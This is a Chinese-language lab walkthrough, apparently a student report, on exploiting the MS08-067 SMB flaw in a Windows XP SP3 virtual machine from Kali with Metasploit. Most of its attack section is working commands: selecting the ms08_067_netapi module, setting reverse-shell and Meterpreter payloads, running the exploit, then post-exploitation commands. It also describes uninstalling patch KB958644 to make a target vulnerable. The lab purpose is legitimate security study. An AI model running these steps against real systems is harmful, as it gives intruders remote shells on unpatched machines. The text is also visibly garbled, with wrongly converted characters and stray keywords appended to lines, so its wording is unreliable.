一、两台虚拟机,其中一台为kali,一台为windows xp sp3(英文版)。shell
二、在VMware中设置两台虚拟机网络为NAT模式,自动分配IP地址,以后两台虚拟机就能够直接ping通。以下图:windows
若是ping不通,通常是ip地址不在同一个网段上,须要从新设置xp的ip地址,打开:控制面板->网络链接->右击本地链接选择属性->选择internet协议(TCP/IP)->属性,就能够编辑ip地址了。例如:kali ip是192.168.241.131,xp ip设置为:192.168.241.130。前三位同样,最后一位随便设置。api
一、在kali终端中开启msfconsole。安全
二、输入命令search ms08_067
,会显示出找到的渗透模块,以下图所示:网络
三、输入命令use exploit/windows/smb/ms08_067_netapi
,进入该漏洞模块的使用。session
四、输入命令show payload
会显示出有效的攻击载荷,以下图所示,咱们找到一个shell_reverse_tcp。tcp
五、命令show targets
会显示出能够被攻击的靶机的操做系统型号,以下图所示:操作系统
六、使用命令set payload generic/shell_reverse_tcp
设置攻击有效载荷。3d
七、输入命令show options
显示咱们须要在攻击前须要设置的数据,以下图红框圈住的部分。code
八、输入命令
set LHOST "kali Ip" set RHOST "Win xp Ip"
并使用命令show options
再次查看payload状态。
九、输入命令exploit
开始攻击,以下图所示是正常攻击成功结果。
在kali上执行ipconfig/all
获得以下图所示:
在win xp上执行一样的命令,以下图所示:
一、前面依然使用命令use exploit/windows/smb/ms08_067_netapi
,进入ms08_067漏洞模块。
二、设置payload:set payload windows/meterpreter/reverse_tcp
三、show options
,查看须要设置的ip地址,以下图所示,是已经设置好的
四、成功攻击结果:
五、执行ifconfig
,查看靶机地址:
六、ps
查看进程:
七、meterpreter转shell:
一、在作实验的时候用老师的xp系统做为靶机,可是在exploit的时候显示以下:no session was created。
二、手动设置一个set session 1
,结果仍是不成功。
三、在exploit
前,使用check
查看靶机状态,返回如下信息,代表目标主机是安全的,不能被攻击。
四、网上查到能够卸载ms08_067的补丁,即卸载KB958644,文件路径:c:/windows找到KB958644(这是个隐藏文件),打开卸载exe程序,以下:
五、重启后,仍是不能成功,最后找了一个英文版的win xp sp 3 ,才成功完成。